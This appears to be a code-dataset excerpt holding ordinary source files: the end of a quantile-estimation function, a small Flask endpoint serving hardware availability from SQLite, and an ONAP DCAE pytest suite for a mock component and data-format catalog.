----------
sample
A 1D vector of values
p
The desired quantile in (0,1)
type
The method for computing the quantile.
See https://wikipedia.org/wiki/Quantile#Estimating_quantiles_from_a_sample
sorted
Whether or not the vector is already sorted into ascending order
Returns
-------
An estimate of the quantile
"""
N = len(sample)
if len(sample.shape) != 1:
raise ValueError("Quantile estimation only supports vectors of univariate samples.")
if not 1/N <= p <= (N-1)/N:
raise ValueError(f"The {p}-quantile should not be estimated using only {N} samples.")
sorted_sample = sample if sorted else sample.sort().values
if type == 6:
h = (N+1)*p
elif type == 7:
h = (N-1)*p + 1
elif type == 8:
h = (N+1/3)*p + 1/3
h_floor = int(h)
quantile = sorted_sample[h_floor-1]
if h_floor != h:
quantile += (h - h_floor)*(sorted_sample[h_floor]-sorted_sample[h_floor-1])
return float(quantile)
| en | 0.696233 | Set the diagonal of a matrix to 0 Parameters ---------- mat A 2D square matrix Returns ------- A 2D square matrix with zeros along the diagonal Estimate a desired quantile of a univariate distribution from a vector of samples Parameters ---------- sample A 1D vector of values p The desired quantile in (0,1) type The method for computing the quantile. See https://wikipedia.org/wiki/Quantile#Estimating_quantiles_from_a_sample sorted Whether or not the vector is already sorted into ascending order Returns ------- An estimate of the quantile | 3.119844 | 3 |
hardware.py | ntw1103/deployment-thing | 0 | 6623929 | from flask import Flask, request, jsonify
import sqlite3 as sql
import time
import random
application = Flask(__name__)
def slow_process_to_calculate_availability(provider, name):
    # Simulate an expensive availability lookup for the given provider/name
    # pair: block for five seconds, then report a random availability level.
    time.sleep(5)
    availability_levels = ['HIGH', 'MEDIUM', 'LOW']
    return random.choice(availability_levels)
@application.route('/hardware/')
def hardware():
    """Return a JSON list of availability statuses for every hardware row.

    Reads all rows from the `hardware` table and attaches a (slowly
    computed) availability level to each provider/name pair.
    """
    con = sql.connect('database.db')
    try:
        c = con.cursor()
        # row[1]/row[2] are used as provider and name respectively —
        # NOTE(review): inferred from usage, confirm against the schema.
        statuses = [
            {
                'provider': row[1],
                'name': row[2],
                'availability': slow_process_to_calculate_availability(
                    row[1],
                    row[2]
                ),
            }
            for row in c.execute('SELECT * from hardware')
        ]
    finally:
        # Close the connection even when the query raises; previously the
        # handle leaked on any exception before con.close().
        con.close()
    return jsonify(statuses)
if __name__ == "__main__":
application.run(host='0.0.0.0', port=5001)
| from flask import Flask, request, jsonify
import sqlite3 as sql
import time
import random
application = Flask(__name__)
def slow_process_to_calculate_availability(provider, name):
    # Simulate an expensive availability lookup for the given provider/name
    # pair: block for five seconds, then report a random availability level.
    time.sleep(5)
    availability_levels = ['HIGH', 'MEDIUM', 'LOW']
    return random.choice(availability_levels)
@application.route('/hardware/')
def hardware():
    """Return a JSON list of availability statuses for every hardware row.

    Reads all rows from the `hardware` table and attaches a (slowly
    computed) availability level to each provider/name pair.
    """
    con = sql.connect('database.db')
    try:
        c = con.cursor()
        # row[1]/row[2] are used as provider and name respectively —
        # NOTE(review): inferred from usage, confirm against the schema.
        statuses = [
            {
                'provider': row[1],
                'name': row[2],
                'availability': slow_process_to_calculate_availability(
                    row[1],
                    row[2]
                ),
            }
            for row in c.execute('SELECT * from hardware')
        ]
    finally:
        # Close the connection even when the query raises; previously the
        # handle leaked on any exception before con.close().
        con.close()
    return jsonify(statuses)
if __name__ == "__main__":
application.run(host='0.0.0.0', port=5001)
| none | 1 | 2.727624 | 3 | |
mod/onboardingapi/dcae_cli/catalog/mock/tests/test_mock_catalog.py | onap/dcaegen2-platform | 1 | 6623930 | # ============LICENSE_START=======================================================
# org.onap.dcae
# ================================================================================
# Copyright (c) 2017-2018 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
#
# ECOMP is a trademark and service mark of AT&T Intellectual Property.
# -*- coding: utf-8 -*-
'''
Tests the mock catalog
'''
import json
from copy import deepcopy
from functools import partial
import pytest
from sqlalchemy.exc import IntegrityError
from dcae_cli.catalog.mock.catalog import MockCatalog, MissingEntry, DuplicateEntry, _get_unique_format_things
from dcae_cli.catalog.mock import catalog
_c1_spec = {'self': {'name': 'std.comp_one',
'version': '1.0.0',
'description': 'comp1',
'component_type': 'docker'},
'streams': {'publishes': [{'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'}],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'config_key': 'call1'}],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [{"name": "foo",
"value": 1,
"description": "the foo thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False},
{"name": "bar",
"value": 2,
"description": "the bar thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False}
],
'artifacts': [{ "uri": "foo-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2_spec = {'self': {'name': 'std.comp_two',
'version': '1.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bar-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2v2_spec = {'self': {'name': 'std.comp_two',
'version': '2.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "baz-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c3_spec = {'self': {'name': 'std.comp_three',
'version': '3.0.0',
'description': 'comp3',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_two',
'version': '1.5.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_two',
'version': '1.5.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bazinga-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_df1_spec = {
"self": {
"name": "std.format_one",
"version": "1.0.0",
"description": "df1"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2_spec = {
"self": {
"name": "std.format_two",
"version": "1.5.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2v2_spec = {
"self": {
"name": "std.format_two",
"version": "2.0.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_cdap_spec={
"self":{
"name":"std.cdap_comp",
"version":"0.0.0",
"description":"cdap test component",
"component_type":"cdap"
},
"streams":{
"publishes":[
{
"format":"std.format_one",
"version":"1.0.0",
"config_key":"pub1",
"type": "http"
}
],
"subscribes":[
{
"format":"std.format_two",
"version":"1.5.0",
"route":"/sub1",
"type": "http"
}
]
},
"services":{
"calls":[
],
"provides":[
{
"request":{
"format":"std.format_one",
"version":"1.0.0"
},
"response":{
"format":"std.format_two",
"version":"1.5.0"
},
"service_name":"baphomet",
"service_endpoint":"rises",
"verb":"GET"
}
]
},
"parameters": {
"app_config" : [],
"app_preferences" : [],
"program_preferences" : []
},
"artifacts": [{"uri": "bahpomet.com", "type": "jar"}],
"auxilary": {
"streamname":"streamname",
"artifact_version":"6.6.6",
"artifact_name": "test_name",
"programs" : [{"program_type" : "flows", "program_id" : "flow_id"}]
}
}
def test_component_basic(mock_cli_config, mock_db_url, catalog=None):
    '''Tests basic component usage of MockCatalog.

    Covers: duplicate format rejection, missing-format rejection when adding
    a component, duplicate component rejection, and version resolution via
    verify_component.
    '''
    if catalog is None:
        # Fresh throwaway catalog; enforce_image=False avoids docker checks.
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    c1_spec = deepcopy(_c1_spec)
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    user = "test_component_basic"
    # success
    mc.add_format(df2_spec, user)
    # duplicate
    with pytest.raises(DuplicateEntry):
        mc.add_format(df2_spec, user)
    # component relies on df1_spec which hasn't been added
    with pytest.raises(MissingEntry):
        mc.add_component(user, c1_spec)
    # add df1 and comp1
    mc.add_format(df1_spec, user)
    mc.add_component(user, c1_spec)
    with pytest.raises(DuplicateEntry):
        mc.add_component(user, c1_spec)
    # version=None resolves the latest stored version of the component
    cname, cver = mc.verify_component('std.comp_one', version=None)
    assert cver == '1.0.0'
def test_format_basic(mock_cli_config, mock_db_url, catalog=None):
    '''Tests basic data format usage of MockCatalog.

    Covers: duplicate rejection, in-place update of an existing version,
    adding a new version, updating a non-existent format, and retrieval of
    the latest spec.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_format_basic"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    # success
    mc.add_format(df1_spec, user)
    # duplicate is bad
    with pytest.raises(DuplicateEntry):
        mc.add_format(df1_spec, user)
    # allow update of same version
    new_descr = 'a new description'
    df1_spec['self']['description'] = new_descr
    mc.add_format(df1_spec, user, update=True)
    # adding a new version is kosher
    new_ver = '2.0.0'
    df1_spec['self']['version'] = new_ver
    mc.add_format(df1_spec, user)
    # can't update a format that doesn't exist
    with pytest.raises(MissingEntry):
        mc.add_format(df2_spec, user, update=True)
    # get spec and make sure it's updated; version=None fetches the latest
    spec = mc.get_format_spec(df1_spec['self']['name'], version=None)
    assert spec['self']['version'] == new_ver
    assert spec['self']['description'] == new_descr
def test_discovery(mock_cli_config, mock_db_url, catalog=None):
    '''Tests creation of discovery objects.

    Adds comp_one and comp_two (comp_two subscribes/provides the format
    comp_one publishes/calls) and checks the docker discovery output maps
    comp_one's config keys to comp_two.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_discovery"
    c1_spec = deepcopy(_c1_spec)
    df1_spec = deepcopy(_df1_spec)
    c2_spec = deepcopy(_c2_spec)
    mc.add_format(df1_spec, user)
    mc.add_component(user, c1_spec)
    mc.add_component(user, c2_spec)
    params, interfaces = mc.get_discovery_for_docker(c1_spec['self']['name'], c1_spec['self']['version'])
    # params come from c1's parameter list; interfaces map c1's config keys
    # to the (name, version) of components satisfying them.
    assert params == {'bar': 2, 'foo': 1}
    assert interfaces == {'call1': [('std.comp_two', '1.0.0')], 'pub1': [('std.comp_two', '1.0.0')]}
def _spec_tuple(dd):
'''Returns a (name, version, component type) tuple from a given component spec dict'''
return dd['self']['name'], dd['self']['version'], dd['self']['component_type']
def _comp_tuple_set(*dds):
    '''Runs a set of component spec tuples'''
    return {_spec_tuple(dd) for dd in dds}
def _format_tuple(dd):
'''Returns a (name, version) tuple from a given data format spec dict'''
return dd['self']['name'], dd['self']['version']
def _format_tuple_set(*dds):
    '''Runs a set of data format spec tuples'''
    return {_format_tuple(dd) for dd in dds}
def test_comp_list(mock_cli_config, mock_db_url, catalog=None):
    '''Tests the list functionality of the catalog.

    Loads three formats and five components (two versions of comp_two),
    then exercises list_components filtering: latest-only vs all,
    subscribes/publishes/calls/provides filters, missing-format errors,
    and the only_published flag.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_comp_list"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    df2v2_spec = deepcopy(_df2v2_spec)
    c1_spec = deepcopy(_c1_spec)
    c2_spec = deepcopy(_c2_spec)
    c2v2_spec = deepcopy(_c2v2_spec)
    c3_spec = deepcopy(_c3_spec)
    mc.add_format(df1_spec, user)
    mc.add_format(df2_spec, user)
    mc.add_format(df2v2_spec, user)
    mc.add_component(user, c1_spec)
    mc.add_component(user, c2_spec)
    mc.add_component(user, c2v2_spec)
    mc.add_component(user, c3_spec)
    mc.add_component(user,_cdap_spec)
    def components_to_specs(components):
        # list_components returns rows with a JSON-encoded "spec" field
        return [ json.loads(c["spec"]) for c in components ]
    # latest by default. only v2 of c2
    components = mc.list_components()
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec, c3_spec, _cdap_spec)
    # all components
    components = mc.list_components(latest=False)
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2_spec, c2v2_spec, c3_spec, _cdap_spec)
    # version=None in a filter means "latest version of that format"
    components = mc.list_components(subscribes=[('std.format_one', None)])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec)
    # no comps subscribe to latest std.format_two
    components = mc.list_components(subscribes=[('std.format_two', None)])
    assert not components
    components = mc.list_components(subscribes=[('std.format_two', '1.5.0')])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
    # raise if format doesn't exist
    with pytest.raises(MissingEntry):
        mc.list_components(subscribes=[('std.format_two', '5.0.0')])
    components = mc.list_components(publishes=[('std.format_one', None)])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, _cdap_spec)
    components = mc.list_components(calls=[(('std.format_one', None), ('std.format_one', None)), ])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
    # raise if format doesn't exist
    with pytest.raises(MissingEntry):
        mc.list_components(calls=[(('std.format_one', '5.0.0'), ('std.format_one', None)), ])
    components = mc.list_components(provides=[(('std.format_one', '1.0.0'), ('std.format_two', '1.5.0')), ])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
    # test for listing published components
    name_pub = c1_spec["self"]["name"]
    version_pub = c1_spec["self"]["version"]
    mc.publish_component(user, name_pub, version_pub)
    components = mc.list_components(only_published=True)
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
    # only_published=False still applies the default latest-only view (4 comps)
    components = mc.list_components(only_published=False)
    assert len(components) == 4
def test_format_list(mock_cli_config, mock_db_url, catalog=None):
    '''Tests the list functionality of the catalog for data formats.

    Verifies latest-only vs all listing and the only_published flag.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_format_list"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    df2v2_spec = deepcopy(_df2v2_spec)
    mc.add_format(df1_spec, user)
    mc.add_format(df2_spec, user)
    mc.add_format(df2v2_spec, user)
    def formats_to_specs(components):
        # list_formats returns rows with a JSON-encoded "spec" field
        return [ json.loads(c["spec"]) for c in components ]
    # latest by default. ensure only v2 of df2 makes it
    formats = mc.list_formats()
    specs = formats_to_specs(formats)
    assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2v2_spec)
    # list all
    formats = mc.list_formats(latest=False)
    specs = formats_to_specs(formats)
    assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2_spec, df2v2_spec)
    # test listing of published formats
    name_pub = df1_spec["self"]["name"]
    version_pub = df1_spec["self"]["version"]
    mc.publish_format(user, name_pub, version_pub)
    formats = mc.list_formats(only_published=True)
    specs = formats_to_specs(formats)
    assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec)
    formats = mc.list_formats(only_published=False)
    assert len(formats) == 2
def test_component_add_cdap(mock_cli_config, mock_db_url, catalog=None):
    '''Adds a mock CDAP application and checks get_cdap round-trips it.'''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_component_add_cdap"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    mc.add_format(df1_spec, user)
    mc.add_format(df2_spec, user)
    mc.add_component(user, _cdap_spec)
    name, version, _ = _spec_tuple(_cdap_spec)
    # get_cdap returns (jar uri, cdap config, full spec)
    jar_out, cdap_config_out, spec_out = mc.get_cdap(name, version)
    assert _cdap_spec["artifacts"][0]["uri"] == jar_out
    assert _cdap_spec["auxilary"] == cdap_config_out
    assert _cdap_spec == spec_out
def test_get_discovery_from_spec(mock_cli_config, mock_db_url):
    '''Tests discovery generation straight from a spec dict.

    Exercises four scenarios: component not yet in the catalog, component
    already in the catalog (updated spec wins), a message-router stream
    (moves the key from the interface map to the dmaap config keys), and a
    CDAP spec not yet in the catalog.
    '''
    mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
            enforce_image=False, db_url=mock_db_url)
    user = "test_get_discovery_from_spec"
    c1_spec_updated = deepcopy(_c1_spec)
    c1_spec_updated["streams"]["publishes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'config_key': 'pub1',
        'type': 'http'
    }
    c1_spec_updated["streams"]["subscribes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'route': '/sub1',
        'type': 'http'
    }
    # Case when c1 doesn't exist
    mc.add_format(_df1_spec, user)
    mc.add_component(user, _c2_spec)
    actual_params, actual_interface_map, actual_dmaap_config_keys \
            = mc.get_discovery_from_spec(user, c1_spec_updated, None)
    assert actual_params == {'bar': 2, 'foo': 1}
    assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
            'call1': [('std.comp_two', '1.0.0')] }
    assert actual_dmaap_config_keys == ([], [])
    # Case when c1 already exist
    mc.add_component(user,_c1_spec)
    # renaming the call's config_key must show up in the interface map
    c1_spec_updated["services"]["calls"][0]["config_key"] = "callme"
    actual_params, actual_interface_map, actual_dmaap_config_keys \
            = mc.get_discovery_from_spec(user, c1_spec_updated, None)
    assert actual_params == {'bar': 2, 'foo': 1}
    assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
            'callme': [('std.comp_two', '1.0.0')] }
    assert actual_dmaap_config_keys == ([], [])
    # Case where add in dmaap streams
    # TODO: Add in subscribes test case after spec gets pushed
    c1_spec_updated["streams"]["publishes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'config_key': 'pub1',
        'type': 'message router'
    }
    actual_params, actual_interface_map, actual_dmaap_config_keys \
            = mc.get_discovery_from_spec(user, c1_spec_updated, None)
    assert actual_params == {'bar': 2, 'foo': 1}
    # message-router publishes leave the interface map and appear as the
    # first element of the dmaap config keys tuple (publishes, subscribes)
    assert actual_interface_map == { 'callme': [('std.comp_two', '1.0.0')] }
    assert actual_dmaap_config_keys == (["pub1"], [])
    # Case when cdap spec doesn't exist
    cdap_spec = deepcopy(_cdap_spec)
    cdap_spec["streams"]["publishes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'config_key': 'pub1',
        'type': 'http'
    }
    cdap_spec["streams"]["subscribes"][0] = {
        'format': 'std.format_two',
        'version': '1.5.0',
        'route': '/sub1',
        'type': 'http'
    }
    mc.add_format(_df2_spec, user)
    actual_params, actual_interface_map, actual_dmaap_config_keys \
            = mc.get_discovery_from_spec(user, cdap_spec, None)
    assert actual_params == {'program_preferences': [], 'app_config': {}, 'app_preferences': {}}
    assert actual_interface_map == {'pub1': [('std.comp_two', '1.0.0'), ('std.comp_one', '1.0.0')]}
    assert actual_dmaap_config_keys == ([], [])
def test_get_unpublished_formats(mock_cli_config, mock_db_url, catalog=None):
    '''A component's unpublished formats shrink to none once published.'''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_get_unpublished_formats"
    mc.add_format(_df1_spec, user)
    mc.add_component(user, _c1_spec)
    # detect unpublished formats
    name_to_pub = _c1_spec["self"]["name"]
    version_to_pub = _c1_spec["self"]["version"]
    formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
    assert [('std.format_one', '1.0.0')] == formats
    # all formats published
    mc.publish_format(user, _df1_spec["self"]["name"], _df1_spec["self"]["version"])
    formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
    assert len(formats) == 0
def test_get_unique_format_things():
    '''_get_unique_format_things de-duplicates entries by (name, version)
    and maps each unique pair through the provided ORM factory.'''
    def create_tuple(entry):
        # key extractor used for uniqueness
        return (entry["name"], entry["version"])
    def get_orm(name, version):
        # stand-in ORM constructor; just tags its inputs
        return ("ORM", name, version)
    entries = [{"name": "abc", "version": 123},
               {"name": "abc", "version": 123},
               {"name": "abc", "version": 123},
               {"name": "def", "version": 456},
               {"name": "def", "version": 456}]
    get_unique_fake_format = partial(_get_unique_format_things, create_tuple,
            get_orm)
    expected = [("ORM", "abc", 123), ("ORM", "def", 456)]
    # sorted() because the result order is not asserted to be stable
    assert sorted(expected) == sorted(get_unique_fake_format(entries))
def test_filter_latest():
    '''_filter_latest keeps only the highest version per name.'''
    orms = [('std.empty.get', '1.0.0'), ('std.unknown', '1.0.0'),
            ('std.unknown', '1.0.1'), ('std.empty.get', '1.0.1')]
    assert list(catalog._filter_latest(orms)) == [('std.empty.get', '1.0.1'), \
            ('std.unknown', '1.0.1')]
def test_raise_if_duplicate():
    '''_raise_if_duplicate translates DB uniqueness violations into
    DuplicateEntry for both sqlite and postgres backends.'''
    class FakeOrig(object):
        # sqlite reports uniqueness violations via the message args
        args = ["unique", "duplicate"]
    url = "sqlite"
    orig = FakeOrig()
    error = IntegrityError("Error about uniqueness", None, orig)
    with pytest.raises(catalog.DuplicateEntry):
        catalog._raise_if_duplicate(url, error)
    # Couldn't find psycopg2.IntegrityError constructor nor way
    # to set pgcode so decided to mock it.
    class FakeOrigPostgres(object):
        # 23505 is the postgres unique_violation error code
        pgcode = "23505"
    url = "postgres"
    orig = FakeOrigPostgres()
    error = IntegrityError("Error about uniqueness", None, orig)
    with pytest.raises(catalog.DuplicateEntry):
        catalog._raise_if_duplicate(url, error)
def test_get_docker_image_from_spec():
    # The docker image uri comes from the spec's "docker image" artifact.
    assert "foo-image" == catalog._get_docker_image_from_spec(_c1_spec)
def test_get_cdap_jar_from_spec():
    # The cdap jar uri comes from the spec's "jar" artifact.
    assert "bahpomet.com" == catalog._get_cdap_jar_from_spec(_cdap_spec)
def test_build_config_keys_map():
    '''build_config_keys_map indexes every config_key by its group; entries
    without a config_key (route-based subscribes/provides) are skipped.'''
    stub_spec = {
        'streams': {
            'publishes': [
                {'format': 'std.format_one', 'version': '1.0.0',
                    'config_key': 'pub1', 'type': 'http'},
                {'format': 'std.format_one', 'version': '1.0.0',
                    'config_key': 'pub2', 'type': 'message_router'}
                ],
            'subscribes': [
                {'format': 'std.format_one', 'version': '1.0.0', 'route': '/sub1',
                    'type': 'http'},
                {'format': 'std.format_one', 'version': '1.0.0',
                    'config_key': 'sub2', 'type': 'message_router'}
                ]
            },
        'services': {
            'calls': [
                {'request': {'format': 'std.format_one', 'version': '1.0.0'},
                    'response': {'format': 'std.format_one', 'version': '1.0.0'},
                    'config_key': 'call1'}
                ],
            'provides': [
                {'request': {'format': 'std.format_one', 'version': '1.0.0'},
                    'response': {'format': 'std.format_one', 'version': '1.0.0'},
                    'route': '/prov1'}
                ]
            }
        }
    grouping = catalog.build_config_keys_map(stub_spec)
    expected = {'call1': {'group': 'services_calls'}, 'pub1': {'type': 'http', 'group': 'streams_publishes'}, 'sub2': {'type': 'message_router', 'group': 'streams_subscribes'}, 'pub2': {'type': 'message_router', 'group': 'streams_publishes'}}
    assert expected == grouping
def test_get_data_router_subscriber_route():
    '''Route lookup only succeeds for data_router subscribers with a route;
    message_router keys and unknown keys raise MissingEntry.'''
    spec = {"streams": {"subscribes": [ { "type": "data_router", "config_key":
        "alpha", "route": "/alpha" }, { "type": "message_router", "config_key":
        "beta" } ]}}
    assert "/alpha" == catalog.get_data_router_subscriber_route(spec, "alpha")
    with pytest.raises(catalog.MissingEntry):
        catalog.get_data_router_subscriber_route(spec, "beta")
    with pytest.raises(catalog.MissingEntry):
        catalog.get_data_router_subscriber_route(spec, "gamma")
if __name__ == '__main__':
    '''Test area'''
    # Allow running this module directly: delegate to pytest on this file.
    pytest.main([__file__, ])
| # ============LICENSE_START=======================================================
# org.onap.dcae
# ================================================================================
# Copyright (c) 2017-2018 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
#
# ECOMP is a trademark and service mark of AT&T Intellectual Property.
# -*- coding: utf-8 -*-
'''
Tests the mock catalog
'''
import json
from copy import deepcopy
from functools import partial
import pytest
from sqlalchemy.exc import IntegrityError
from dcae_cli.catalog.mock.catalog import MockCatalog, MissingEntry, DuplicateEntry, _get_unique_format_things
from dcae_cli.catalog.mock import catalog
_c1_spec = {'self': {'name': 'std.comp_one',
'version': '1.0.0',
'description': 'comp1',
'component_type': 'docker'},
'streams': {'publishes': [{'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'}],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'config_key': 'call1'}],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [{"name": "foo",
"value": 1,
"description": "the foo thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False},
{"name": "bar",
"value": 2,
"description": "the bar thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False}
],
'artifacts': [{ "uri": "foo-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2_spec = {'self': {'name': 'std.comp_two',
'version': '1.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bar-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2v2_spec = {'self': {'name': 'std.comp_two',
'version': '2.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "baz-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c3_spec = {'self': {'name': 'std.comp_three',
'version': '3.0.0',
'description': 'comp3',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_two',
'version': '1.5.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_two',
'version': '1.5.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bazinga-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
